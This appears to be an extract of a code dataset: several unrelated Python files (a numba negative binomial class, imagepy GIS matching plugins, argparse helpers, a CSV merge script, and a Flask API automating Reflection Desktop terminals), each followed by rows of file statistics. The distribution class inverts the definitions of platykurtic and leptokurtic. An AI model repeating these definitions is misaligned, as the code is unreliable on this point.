    return (p/(1 - (1 - p)*np.exp(x)))**r

@vectorize(nopython=True)
def nbinom_cf(r, p, x):
    return (p/(1 - (1 - p)*np.exp(x*1j)))**r

# -------------
# NegativeBinomial
# -------------
# numba jitclass field layout for NegativeBinomial below
spec = [
    ('r', int32), ("p", float32)
]
@jitclass(spec)
class NegativeBinomial():
    # set docstring
    __doc__ = _create_class_docstr(**mtdt['NegativeBinomial'])

    def __init__(self, r, p):
        # r: target number of successes, p: success probability
        self.r, self.p = r, p

    def __str__(self):
        return "NegativeBinomial(r=%.5f, p=%.5f)" %(self.params)

    def __repr__(self):
        return self.__str__()

    # ===================
    # Parameter retrieval
    # ===================
    @property
    def params(self):
        """Return a tuple of parameters."""
        return (self.r, self.p)

    @property
    def location(self):
        """Return location parameter if exists."""
        return None

    @property
    def scale(self):
        """Return scale parameter if exists."""
        return None

    @property
    def shape(self):
        """Return shape parameter if exists."""
        return None

    # ==========
    # Statistics
    # ==========
    @property
    def mean(self):
        """Return the mean."""
        return (1 - self.p)*self.r/self.p

    @property
    def median(self):
        """Return the median."""
        return None

    @property
    def mode(self):
        """Return the mode."""
        return np.floor((1 - self.p)*(self.r - 1 )/self.p)

    @property
    def var(self):
        """Return the variance."""
        return (1 - self.p)*self.r/self.p**2

    @property
    def std(self):
        """Return the standard deviation."""
        return np.sqrt(self.var)

    @property
    def skewness(self):
        """Return the skewness."""
        return (2 - self.p)/(np.sqrt((1 - self.p)*self.r))

    @property
    def kurtosis(self):
        """Return the kurtosis."""
        return 6/self.r + self.p**2/((1 - self.p)*self.r)

    @property
    def isplatykurtic(self):
        """Kurtosis being greater than zero."""
        return self.kurtosis > 0

    @property
    def isleptokurtic(self):
        """Kurtosis being smaller than zero."""
        return self.kurtosis < 0

    @property
    def ismesokurtic(self):
        """Kurtosis being equal to zero."""
        return self.kurtosis == 0.0

    @property
    def entropy(self):
        """Return the entropy."""
        return None

    def mgf(self, x):
        """Evaluate the moment generating function at x."""
        return nbinom_mgf(self.r, self.p, x)

    def cf(self, x):
        """Evaluate the characteristic function at x."""
        return nbinom_cf(self.r, self.p, x)

    # ==========
    # Evaluation
    # ==========
    def insupport(self, x):
        """When x is a scalar, return whether x is within
        the support of the distribution. When x is an array,
        return whether every element of x is within
        the support of the distribution."""
        # NOTE(review): only checks the type, not the value range
        return isinstance(x, int)

    def pdf(self, x):
        """The pdf value(s) evaluated at x."""
        return nbinom_pdf(self.r, self.p, x)

    def logpdf(self, x):
        """The logarithm of the pdf value(s) evaluated at x."""
        return nbinom_logpdf(self.r, self.p, x)

    def loglikelihood(self, x):
        """The log-likelihood of the distribution w.r.t. all
        samples contained in array x."""
        return sum(nbinom_logpdf(self.r, self.p, x))

    def cdf(self, x):
        """The cdf value(s) evaluated at x."""
        return nbinom_cdf(self.r, self.p, x)

    def ccdf(self, x):
        """The complementary cdf evaluated at x, i.e. 1 - cdf(x)."""
        return nbinom_ccdf(self.r, self.p, x)

    def logcdf(self, x):
        """The logarithm of the cdf value(s) evaluated at x."""
        return nbinom_logcdf(self.r, self.p, x)

    def logccdf(self, x):
        """The logarithm of the complementary cdf evaluated at x."""
        return nbinom_logccdf(self.r, self.p, x)

    def quantile(self, q):
        """The quantile value evaluated at q."""
        return nbinom_invcdf(self.r, self.p, q)

    def cquantile(self, q):
        """The complementary quantile value evaluated at q."""
        return nbinom_invccdf(self.r, self.p, q)

    def invlogcdf(self, lq):
        """The inverse function of the logcdf."""
        return nbinom_invlogcdf(self.r, self.p, lq)

    def invlogccdf(self, lq):
        """The inverse function of the logccdf."""
        return nbinom_invlogccdf(self.r, self.p, lq)

    # ========
    # Sampling
    # ========
    def rand(self, n):
        """Generates a vector of n independent samples from the distribution."""
        out = np.empty(n)
        for i, _ in np.ndenumerate(out):
            out[i] = nbinom_rand(self.r, self.p)
        return out
| 24.425639
| 339
| 0.578874
| 14,440
| 107,082
| 4.219806
| 0.025416
| 0.0332
| 0.054403
| 0.080349
| 0.870335
| 0.82504
| 0.776315
| 0.745249
| 0.679916
| 0.599632
| 0
| 0.012593
| 0.2577
| 107,082
| 4,384
| 340
| 24.425639
| 0.753998
| 0.246717
| 0
| 0.568192
| 0
| 0
| 0.024007
| 0.000893
| 0
| 0
| 0
| 0
| 0
| 1
| 0.335186
| false
| 0
| 0.004275
| 0.109021
| 0.681915
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
1b22a2694b26c811ca8c907c6331200c0c827d80
| 151
|
py
|
Python
|
src/Python.Flask/Python.Flask.Vue.Vuetify2/ServerApp/Controllers/__init__.py
|
grbd/GBD.NetCore.WebTemplates
|
19dee03ecc98279c10999fe6c32c61e17357d4c9
|
[
"MIT"
] | null | null | null |
src/Python.Flask/Python.Flask.Vue.Vuetify2/ServerApp/Controllers/__init__.py
|
grbd/GBD.NetCore.WebTemplates
|
19dee03ecc98279c10999fe6c32c61e17357d4c9
|
[
"MIT"
] | null | null | null |
src/Python.Flask/Python.Flask.Vue.Vuetify2/ServerApp/Controllers/__init__.py
|
grbd/GBD.NetCore.WebTemplates
|
19dee03ecc98279c10999fe6c32c61e17357d4c9
|
[
"MIT"
] | null | null | null |
import ServerApp.Controllers.HomeController
import ServerApp.Controllers.SampleDataController
# TODO
#import ServerApp.Controllers.WeatherController
| 21.571429
| 49
| 0.880795
| 13
| 151
| 10.230769
| 0.538462
| 0.338346
| 0.586466
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066225
| 151
| 6
| 50
| 25.166667
| 0.943262
| 0.331126
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
1b49920e54edbbfec6c02f64baa88be6d173b015
| 9,150
|
py
|
Python
|
menus/GIS/Match/match_plgs.py
|
Image-Py/gistool
|
064ebc5d1b0532903b13c5c207a4fac1ad29786c
|
[
"BSD-3-Clause"
] | 1
|
2019-06-13T17:02:14.000Z
|
2019-06-13T17:02:14.000Z
|
menus/GIS/Match/match_plgs.py
|
Image-Py/gistool
|
064ebc5d1b0532903b13c5c207a4fac1ad29786c
|
[
"BSD-3-Clause"
] | null | null | null |
menus/GIS/Match/match_plgs.py
|
Image-Py/gistool
|
064ebc5d1b0532903b13c5c207a4fac1ad29786c
|
[
"BSD-3-Clause"
] | 2
|
2019-06-04T09:26:31.000Z
|
2019-08-09T02:37:54.000Z
|
from imagepy import IPy
from imagepy.core.engine import Free, Simple, Table
from imagepy.core.manager import ImageManager, TableManager
import os.path as osp
import geonumpy.match as gmt
import geonumpy.util as gutil
import geonumpy as gnp
from glob import glob
class BuildIdx(Free):
    """Menu plugin: build a bound-index table from a directory of raster files."""
    title = 'Build Bound Index'
    para = {'path':''}
    filt = ['HDF', 'TIF', 'TIFF']

    def show(self):
        # file-open dialog filter string, e.g. "TIF files (*.tif)|*.tif"
        filt = '|'.join(['%s files (*.%s)|*.%s'%(i.upper(),i,i) for i in self.filt])
        return IPy.getpath('Build idx', filt, 'open', self.para)

    #process
    def run(self, para = None):
        p, f = osp.split(para['path'])
        name, ext = osp.splitext(f)
        # index every sibling file in the same folder with the same extension
        s = p+'/*'+ext
        gdf = gmt.build_index(glob(s))
        IPy.show_table(gdf, '%s-idx'%name)
class MakePaper(Table):
    """Menu plugin: create a blank image covering the bounds of the selected table."""
    title = 'Make Bound Image'
    note = ['snap', 'row_msk']
    para = {'type':'uint8', 'chan':1, 'width':1024, 'height':768, 'scale':0, 'mar':0}
    view = [(int, 'width', (100, 20480), 0, 'width', 'pix'),
            (int, 'height', (100, 20480), 0, 'height', 'pix'),
            (float, 'scale', (0, 1000), 2, 'scale', 'unit'),
            (float, 'mar', (0, 0.25), 2, 'margin', 'ratio'),
            (int, 'chan', (1, 1024), 0, 'channels', 'n'),
            (list, 'type', ['uint8', 'int16', 'int32', 'float32'], str, 'data', 'type')]

    def run(self, tps, snap, data, para=None):
        # a zero scale is falsy, so the explicit width/height pair is used instead
        box = gutil.shp2box(snap, para['scale'] or (para['width'], para['height']), para['mar'])
        IPy.show_img([gnp.frombox(*box, para['chan'], dtype=para['type'])], tps.title+'-boximg')
class MatchImgDes(Simple):
    """Menu plugin: resample the current image stack onto a destination image."""
    title = 'Match Img To Des'
    note = ['all']
    para = {'temp':None, 'step':10, 'order':'nearest', 'chans':[]}
    view = [('img', 'temp', 'temp', ''),
            (int, 'step', (1,100), 0, 'step', ''),
            (list, 'order', ['nearest', 'linear'], str, 'interpolate', ''),
            ()]

    def load(self, ips):
        chans = ['Channel %s'%i for i in range(ips.get_nchannels())]
        # NOTE(review): fills the trailing () placeholder by mutating the
        # class-level `view` list in place (shared across instances)
        self.view[-1] = ('chos', 'chans', chans, 'Channels')
        return True

    #process
    def run(self, ips, imgs, para = None):
        ipst = ImageManager.get(para['temp'])
        # map the chosen channel labels back to integer indices
        chans = ['Channel %s'%i for i in range(ips.get_nchannels())]
        chans = [chans.index(i) for i in para['chans']]
        order = {'nearest':0, 'linear':1}[para['order']]
        # rst is unused — presumably match_multi fills ipst.img in place; verify
        rst = gmt.match_multi(imgs, ipst.img, chans, step=para['step'], order=order)
        ipst.update()
class MatchImgShp(Simple):
    """Menu plugin: resample the current image stack onto a box built from a shape table."""
    title = 'Match Img To Shp'
    note = ['all']
    para = {'temp':None, 'step':10, 'order':'nearest', 'chans':[],
            'width':1024, 'height':768, 'scale':0, 'mar':0}
    view = [('tab', 'temp', 'temp', ''),
            (int, 'width', (100, 20480), 0, 'width', 'pix'),
            (int, 'height', (100, 20480), 0, 'height', 'pix'),
            (float, 'scale', (0, 1000), 2, 'scale', 'unit'),
            (float, 'mar', (0, 0.25), 2, 'margin', 'ratio'),
            (int, 'step', (1,100), 0, 'step', ''),
            (list, 'order', ['nearest', 'linear'], str, 'interpolate', ''),
            ()]

    def load(self, ips):
        chans = ['Channel %s'%i for i in range(ips.get_nchannels())]
        # fill the trailing () placeholder with a channel chooser
        self.view[-1] = ('chos', 'chans', chans, 'Channels')
        return True

    #process
    def run(self, ips, imgs, para = None):
        table = TableManager.get(para['temp']).get_subtab()
        # a zero scale is falsy, so the explicit width/height pair is used instead
        box = gutil.shp2box(table, para['scale'] or (para['width'], para['height']), para['mar'])
        chans = ['Channel %s'%i for i in range(ips.get_nchannels())]
        chans = [chans.index(i) for i in para['chans']]
        order = {'nearest':0, 'linear':1}[para['order']]
        rst = gmt.match_multi(imgs, box, chans, step=para['step'], order=order)
        IPy.show_img([rst], ips.title+'-merge')
class MatchImgCrs(Simple):
    """Menu plugin: reproject the current image stack into a target CRS
    (EPSG code, or a .prj file which takes precedence)."""
    title = 'Match Img To Crs'
    note = ['all']
    para = {'step':10, 'order':'nearest', 'chans':[], 'crs':4326,
            'wkt':'', 'width':1024, 'height':768, 'scale':0, 'mar':0}
    view = [(int, 'crs', (1000,9999), 0, 'crs', 'epsg'),
            ('path', 'wkt', 'prj file', ['prj']),
            ('lab', None, '=== select a prj file will disable the epsg code ==='),
            (int, 'width', (100, 20480), 0, 'width', 'pix'),
            (int, 'height', (100, 20480), 0, 'height', 'pix'),
            (float, 'scale', (0, 1000), 2, 'scale', 'unit'),
            (int, 'step', (1,100), 0, 'step', ''),
            (list, 'order', ['nearest', 'linear'], str, 'interpolate', ''),
            ()]

    def load(self, ips):
        chans = ['Channel %s'%i for i in range(ips.get_nchannels())]
        self.view[-1] = ('chos', 'chans', chans, 'Channels')
        return True

    #process
    def run(self, ips, imgs, para = None):
        prj = None
        if para['wkt'] != '':
            # a selected .prj file overrides the EPSG code (prj is truthy below)
            with open(para['wkt']) as f:
                prj = f.read()
        crs = gutil.makecrs(prj or para['crs'])
        table = gmt.build_index(imgs).to_crs(crs)
        box = gutil.shp2box(table, para['scale'] or (para['width'], para['height']), para['mar'])
        chans = ['Channel %s'%i for i in range(ips.get_nchannels())]
        chans = [chans.index(i) for i in para['chans']]
        order = {'nearest':0, 'linear':1}[para['order']]
        rst = gmt.match_multi(imgs, box, chans, step=para['step'], order=order)
        IPy.show_img([rst], ips.title+'-merge')
class MatchIdxDes(Table):
    """Menu plugin: mosaic files listed in a bound-index table onto a destination image."""
    title = 'Match Idx To Des'
    para = {'temp':None, 'step':10, 'order':'nearest', 'chans':[]}
    view = [('img', 'temp', 'temp', ''),
            (int, 'step', (1,100), 0, 'step', ''),
            (list, 'order', ['nearest', 'linear'], str, 'interpolate', ''),
            ()]

    def load(self, tps):
        # channel labels come from the index table itself
        self.view[-1] = ('chos', 'chans', list(tps.data['channels'][0]), 'Channels')
        return True

    def run(self, tps, snap, data, para=None):
        ipst = ImageManager.get(para['temp'])
        chans = list(data['channels'][0])
        chans = [chans.index(i) for i in para['chans']]
        order = {'nearest':0, 'linear':1}[para['order']]
        # rst is unused — presumably match_idx fills ipst.img in place; verify
        rst = gmt.match_idx(data, ipst.img, chans, step=para['step'], order=order)
        ipst.update()
class MatchIdxShp(Table):
    """Menu plugin: mosaic files listed in a bound-index table onto a box built
    from a shape table."""
    title = 'Match Idx To Shp'
    para = {'temp':None, 'step':10, 'order':'nearest', 'chans':[],
            'width':1024, 'height':768, 'scale':0, 'mar':0}
    view = [('tab', 'temp', 'temp', ''),
            (int, 'width', (100, 20480), 0, 'width', 'pix'),
            (int, 'height', (100, 20480), 0, 'height', 'pix'),
            (float, 'scale', (0, 1000), 2, 'scale', 'unit'),
            (float, 'mar', (0, 0.25), 2, 'margin', 'ratio'),
            (int, 'step', (1,100), 0, 'step', ''),
            (list, 'order', ['nearest', 'linear'], str, 'interpolate', ''),
            ()]

    def load(self, tps):
        self.view[-1] = ('chos', 'chans', list(tps.data['channels'][0]), 'Channels')
        return True

    def run(self, tps, snap, data, para=None):
        table = TableManager.get(para['temp']).get_subtab()
        # a zero scale is falsy, so the explicit width/height pair is used instead
        box = gutil.shp2box(table, para['scale'] or (para['width'], para['height']), para['mar'])
        chans = list(data['channels'][0])
        chans = [chans.index(i) for i in para['chans']]
        order = {'nearest':0, 'linear':1}[para['order']]
        rst = gmt.match_idx(data, box, chans, step=para['step'], order=order)
        IPy.show_img([rst], tps.title+'-merge')
class MatchIdxCrs(Table):
    """Menu plugin: mosaic files listed in a bound-index table into a target CRS
    (EPSG code, or a .prj file which takes precedence)."""
    title = 'Match Idx To Crs'
    note = ['all']
    para = {'step':10, 'order':'nearest', 'chans':[], 'crs':4326,
            'wkt':'', 'width':1024, 'height':768, 'scale':0, 'mar':0}
    view = [(int, 'crs', (1000,9999), 0, 'crs', 'epsg'),
            ('path', 'wkt', 'prj file', ['prj']),
            ('lab', None, '=== select a prj file will disable the epsg code ==='),
            (int, 'width', (100, 20480), 0, 'width', 'pix'),
            (int, 'height', (100, 20480), 0, 'height', 'pix'),
            (float, 'scale', (0, 1000), 2, 'scale', 'unit'),
            (int, 'step', (1,100), 0, 'step', ''),
            (list, 'order', ['nearest', 'linear'], str, 'interpolate', ''),
            ()]

    def load(self, tps):
        self.view[-1] = ('chos', 'chans', list(tps.data['channels'][0]), 'Channels')
        return True

    #process
    def run(self, tps, snap, data, para=None):
        prj = None
        if para['wkt'] != '':
            # a selected .prj file overrides the EPSG code (prj is truthy below)
            with open(para['wkt']) as f:
                prj = f.read()
        crs = gutil.makecrs(prj or para['crs'])
        table = data.to_crs(crs)
        box = gutil.shp2box(table, para['scale'] or (para['width'], para['height']), para['mar'])
        chans = list(data['channels'][0])
        chans = [chans.index(i) for i in para['chans']]
        order = {'nearest':0, 'linear':1}[para['order']]
        rst = gmt.match_idx(data, box, chans, step=para['step'], order=order)
        IPy.show_img([rst], tps.title+'-merge')
# Plugin registration list for the menu framework; '-' inserts a separator
# between the three groups (index building, image matching, index matching).
plgs = [BuildIdx, MakePaper, '-',
        MatchImgDes, MatchImgShp, MatchImgCrs, '-',
        MatchIdxDes, MatchIdxShp, MatchIdxCrs]
| 41.402715
| 97
| 0.512131
| 1,156
| 9,150
| 4.032007
| 0.135813
| 0.046342
| 0.013946
| 0.019524
| 0.811414
| 0.785883
| 0.785883
| 0.784381
| 0.762068
| 0.75413
| 0
| 0.043266
| 0.262404
| 9,150
| 221
| 98
| 41.402715
| 0.647355
| 0.003825
| 0
| 0.730769
| 0
| 0
| 0.191746
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.082418
| false
| 0
| 0.043956
| 0
| 0.368132
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1b5b6bc510027b5e3b5a07a4f210ff9a1a3d78cf
| 4,244
|
py
|
Python
|
hw2/utils.py
|
haem-k/gct634-ai613-2021
|
04f2dc26d38b56e229a1dc7849b25b84941bbcea
|
[
"MIT"
] | null | null | null |
hw2/utils.py
|
haem-k/gct634-ai613-2021
|
04f2dc26d38b56e229a1dc7849b25b84941bbcea
|
[
"MIT"
] | null | null | null |
hw2/utils.py
|
haem-k/gct634-ai613-2021
|
04f2dc26d38b56e229a1dc7849b25b84941bbcea
|
[
"MIT"
] | null | null | null |
import argparse
'''
Parser utils
'''
def train_multilabel():
    """Parse command-line options for multi-label classification training."""
    parser = argparse.ArgumentParser(description="Training model for multi-label classification")
    # (flag, kwargs) table keeps the option set easy to scan and extend
    options = [
        ('--model', dict(type=str, default='baseline', choices=['baseline', 'cnn2d', 'cnn2ddeep', 'cnntf', 'cnntfdeep', 'cnntf2'], help='model architecture')),
        ('--writer', dict(type=str, default='', help='postfix for tensorboard file')),
        ('--batch_size', dict(type=int, default=16, help='batch size')),
        ('--num_workers', dict(type=int, default=2, help='number of workers')),
        ('--sample_rate', dict(type=int, default=16000, help='sampling rate for audio data')),
        ('--duration', dict(type=int, default=3, help='duration of each chunk')),
        ('--optimizer', dict(type=str, default='sgd', choices=['adam', 'sgd'], help='optimizer')),
        ('--num_epochs', dict(type=int, default=10, help='number of training epoch')),
        ('--lr', dict(type=float, default=1e-3, help='learning rate')),
        ('--sr', dict(type=float, default=1e-5, help='stopping rate')),
        ('--momentum', dict(type=float, default=0.9, help='momentum for sgd')),
        ('--weight_decay', dict(type=float, default=0.0, help='weight decay - L2 regularization weight')),
    ]
    for flag, kwargs in options:
        parser.add_argument(flag, **kwargs)
    return parser.parse_args()
def train_metric():
    """Parse command-line options for metric-learning training."""
    parser = argparse.ArgumentParser(description="Training model for metric learning")
    # (flag, kwargs) table keeps the option set easy to scan and extend
    options = [
        ('--model', dict(type=str, default='linear', choices=['linear', 'conv1d', 'conv2d', 'tf', 'tfdeep', 'tf2'], help='model architecture')),
        ('--writer', dict(type=str, default='', help='postfix for tensorboard file')),
        ('--batch_size', dict(type=int, default=16, help='batch size')),
        ('--num_workers', dict(type=int, default=2, help='number of workers')),
        ('--sample_rate', dict(type=int, default=16000, help='sampling rate for audio data')),
        ('--duration', dict(type=int, default=3, help='duration of each chunk')),
        ('--optimizer', dict(type=str, default='sgd', choices=['adam', 'sgd'], help='optimizer')),
        ('--num_epochs', dict(type=int, default=3, help='number of training epoch')),
        ('--lr', dict(type=float, default=1e-3, help='learning rate')),
        ('--sr', dict(type=float, default=1e-5, help='stopping rate')),
        ('--momentum', dict(type=float, default=0.9, help='momentum for sgd')),
        ('--weight_decay', dict(type=float, default=0.0, help='weight decay - L2 regularization weight')),
    ]
    for flag, kwargs in options:
        parser.add_argument(flag, **kwargs)
    return parser.parse_args()
| 94.311111
| 203
| 0.450754
| 363
| 4,244
| 5.165289
| 0.225895
| 0.1152
| 0.2176
| 0.042667
| 0.895467
| 0.894933
| 0.894933
| 0.797867
| 0.797867
| 0.797867
| 0
| 0.018844
| 0.437323
| 4,244
| 45
| 204
| 94.311111
| 0.766332
| 0
| 0
| 0.709677
| 0
| 0
| 0.211598
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.032258
| 0
| 0.16129
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1b71e8a05bf65aab7f152eab09a5951712a28df3
| 3,142
|
py
|
Python
|
merge.py
|
priyagurjar/signal-processing
|
bae7f0830c0e6a7feedbc25774d048fb62059425
|
[
"Apache-2.0"
] | null | null | null |
merge.py
|
priyagurjar/signal-processing
|
bae7f0830c0e6a7feedbc25774d048fb62059425
|
[
"Apache-2.0"
] | null | null | null |
merge.py
|
priyagurjar/signal-processing
|
bae7f0830c0e6a7feedbc25774d048fb62059425
|
[
"Apache-2.0"
] | null | null | null |
import pandas, sys
import pandas as pd
# Merge every subject's "lie" and "truth" feature CSVs into one file.
# Each subject contributes two files; the frame order below (lie then truth,
# subjects in the original a..gh order) matches the previous 30 hand-written
# single-letter variables exactly.
_BASE = "/home/risana/Downloads/Signal-Processing--master/5.Py_Scripts"
_SUBJECTS = ["kushagra", "komal", "nirma", "nisha", "himani", "jayti",
             "disha", "kaajal", "malvika", "rakhi", "shubhi", "arpit",
             "nobha", "priya", "risana"]
frames = [pd.read_csv("%s/%s_%s_R.csv" % (_BASE, subject, label))
          for subject in _SUBJECTS
          for label in ("lie", "truth")]
merged = pd.concat(frames)
merged.to_csv(_BASE + "/result_final.csv", index=False)
| 84.918919
| 108
| 0.80522
| 567
| 3,142
| 4.24515
| 0.121693
| 0.090154
| 0.167428
| 0.28334
| 0.84005
| 0.84005
| 0.84005
| 0.84005
| 0.84005
| 0.84005
| 0
| 0.010019
| 0.015277
| 3,142
| 37
| 108
| 84.918919
| 0.767938
| 0
| 0
| 0
| 0
| 0
| 0.775056
| 0.775056
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1b7bd4337c4a0baf68664105d887d42e6fea291b
| 10,645
|
py
|
Python
|
src/py_reflection/views.py
|
prasun1060/py_reflection
|
fde5e432c0ea44b8a250348330aa8f959e176a70
|
[
"BSD-4-Clause"
] | 2
|
2021-08-08T17:41:20.000Z
|
2022-02-01T20:39:39.000Z
|
src/py_reflection/views.py
|
prasun1060/py_reflection
|
fde5e432c0ea44b8a250348330aa8f959e176a70
|
[
"BSD-4-Clause"
] | null | null | null |
src/py_reflection/views.py
|
prasun1060/py_reflection
|
fde5e432c0ea44b8a250348330aa8f959e176a70
|
[
"BSD-4-Clause"
] | null | null | null |
from . import app, CONTROL_KEYS
import win32com.client as wc
from pywinauto.application import Application as pw
from flask import jsonify, request
def connect_refection(view_idx: int = 1) -> object:
    """Return the Screen COM object of the given Reflection Desktop view.

    Falls through (returning None implicitly) when the workspace cannot be
    reached; every route handler checks for None and reports the error.
    """
    try:
        wgs = wc.GetObject('Reflection Workspace')
        wgs_screen = wgs.GetObject('Frame').view(view_idx).Control.Screen
    except Exception:  # narrowed from a bare except; COM raises various types
        print('Unexpected error occured!, Please check if reflection desktop is open.')
    else:
        return wgs_screen
@app.route('/connect')
def connect():
    """Poll until the Reflection Workspace window can be found and focused."""
    import time
    while True:
        try:
            print('Connecting to Reflection Workspace Desktop')
            # renamed from `app`, which shadowed the Flask `app` object used
            # by the route decorator above
            wks = pw(backend='win32').connect(title_re='.*Reflection*', found_index=0)
            dlg = wks.window()[0]
            dlg.set_focus()
        except Exception:  # narrowed from a bare except
            print('Unable to connect to Reflection Workspace Desktop. retrying...')
            time.sleep(0.1)
        else:
            return jsonify({
                'response': 'Reflection Workspace successfully connected.',
                'error': False
            })
@app.route('/send_keys', methods=['GET', 'POST'])
def send_keys():
    """Type `text` at screen position (x, y) on the given Reflection view.

    Query params: view_idx (default 1), text, x, y.
    Responds with a JSON object carrying 'response' and an 'error' flag.
    """
    view_idx = request.args.get('view_idx')
    if view_idx is None:
        view_idx = 1
    else:
        view_idx = int(view_idx)
    reflection_obj = connect_refection(view_idx=view_idx)
    if reflection_obj is None:
        return jsonify({
            'response': 'Unexpected error occured; Please check if refection desktop is open.',
            'error': True
        })
    text = request.args.get('text')
    if text is None:
        return jsonify({
            'response': 'Unexpected error occured; Text input cannot be None.',
            'error': True
        })
    try:
        # int(None) raises TypeError here when x/y are missing, which the
        # except below converts into the "should be numeric" response
        x = int(request.args.get('x'))
        y = int(request.args.get('y'))
    except:
        return jsonify({
            'response': 'Unexpected error occured; Values of x and y should be numeric.',
            'error': True
        })
    else:
        try:
            reflection_obj.PutText2(text, x, y)
        except:
            print('Unexpected error occured!, Please reconnect to the reflection tool and try again.')
            return jsonify({
                'response': 'Unexpected error occured; Please reconnect to the reflection tool and try again.',
                'error': True
            })
        else:
            return jsonify({
                'response': 'Success',
                'error': False
            })
@app.route('/press_enter', methods=['GET', 'POST'])
def press_enter():
    """Send the Enter control key (code 1) to the given Reflection view."""
    view_idx = request.args.get('view_idx')
    if view_idx is None:
        view_idx = 1
    else:
        view_idx = int(view_idx)
    reflection_obj = connect_refection(view_idx=view_idx)
    if reflection_obj is None:
        return jsonify({
            'response': 'Unexpected error occured; Please check if refection desktop is open.',
            'error': True
        })
    try:
        # control-key code 1 is Enter in the Reflection SendControlKey API
        reflection_obj.SendControlKey(1)
    except Exception:  # narrowed from a bare except
        print('Unexpected error occured!, Please reconnect to the reflection tool and try again.')
        return jsonify({
            'response': 'Unexpected error occured; Please reconnect to the reflection tool and try again.',
            'error': True
        })
    else:
        return jsonify({
            'response': 'Enter pressed successfully',
            'error': False
        })
@app.route('/press_key', methods=['GET', 'POST'])
def press_key():
    """Send a named control key (looked up in CONTROL_KEYS) to the given view."""
    view_idx = request.args.get('view_idx')
    if view_idx is None:
        view_idx = 1
    else:
        view_idx = int(view_idx)
    reflection_obj = connect_refection(view_idx=view_idx)
    if reflection_obj is None:
        return jsonify({
            'response': 'Unexpected error occured; Please check if refection desktop is open.',
            'error': True
        })
    control_key = request.args.get('control_key')
    try:
        # an unknown key name raises KeyError here and is reported via the
        # same error response as a COM failure
        reflection_obj.SendControlKey(CONTROL_KEYS[control_key])
    except Exception:  # narrowed from a bare except
        print('Unexpected error occured!, Please reconnect to the reflection tool and try again.')
        return jsonify({
            'response': 'Unexpected error occured; Please reconnect to the reflection tool and try again.',
            'error': True
        })
    else:
        return jsonify({
            'response': 'Key pressed successfully',
            'error': False
        })
@app.route('/press_control_keys', methods=['GET', 'POST'])
def press_control_keys():
    """Send a numeric control-key code to the given Reflection view."""
    view_idx = request.args.get('view_idx')
    if view_idx is None:
        view_idx = 1
    else:
        view_idx = int(view_idx)
    reflection_obj = connect_refection(view_idx=view_idx)
    if reflection_obj is None:
        return jsonify({
            'response': 'Unexpected error occured; Please check if refection desktop is open.',
            'error': True
        })
    try:
        # Fixed: int() was previously outside the try, so a missing or
        # non-numeric 'control_key' param crashed the handler (HTTP 500)
        # instead of producing the JSON error response.
        control_key = int(request.args.get('control_key'))
        reflection_obj.SendControlKey(control_key)
    except Exception:  # narrowed from a bare except
        print('Unexpected error occured!, Please reconnect to the reflection tool and try again.')
        return jsonify({
            'response': 'Unexpected error occured; Please reconnect to the reflection tool and try again.',
            'error': True
        })
    else:
        return jsonify({
            'response': 'Key pressed successfully',
            'error': False
        })
@app.route('/get_text', methods=['GET', 'POST'])
def get_text():
    """Read `length` characters starting at screen position (x, y).

    Query params: view_idx (default 1), x, y, length.
    """
    view_idx = request.args.get('view_idx')
    if view_idx is None:
        view_idx = 1
    else:
        view_idx = int(view_idx)
    reflection_obj = connect_refection(view_idx=view_idx)
    if reflection_obj is None:
        return jsonify({
            'response': 'Unexpected error occured; Please check if refection desktop is open.',
            'error': True
        })
    try:
        # int(None) raises TypeError when a param is missing; reported below
        x = int(request.args.get('x'))
        y = int(request.args.get('y'))
        length = int(request.args.get('length'))
    except:
        return jsonify({
            'response': 'Unexpected error occured; Values of x and y should be numeric.',
            'error': True
        })
    else:
        try:
            output = reflection_obj.GetText(x, y, length)
        except:
            print('Unexpected error occured!, Please reconnect to the reflection tool and try again.')
            return jsonify({
                'response': 'Unexpected error occured; Please reconnect to the reflection tool and try again.',
                'error': True
            })
        else:
            return jsonify({
                'response': output,
                'error': False
            })
@app.route('/get_text_coordinates', methods=['GET', 'POST'])
def get_text_coordinates():
    """Scan the screen for `text`; respond with its 1-based row/column.

    Responds with {'x': 0, 'y': 0} when the text is not found.
    """
    view_idx = request.args.get('view_idx')
    if view_idx is None:
        view_idx = 1
    else:
        view_idx = int(view_idx)
    reflection_obj = connect_refection(view_idx=view_idx)
    if reflection_obj is None:
        return jsonify({
            'response': 'Unexpected error occured; Please check if refection desktop is open.',
            'error': True
        })
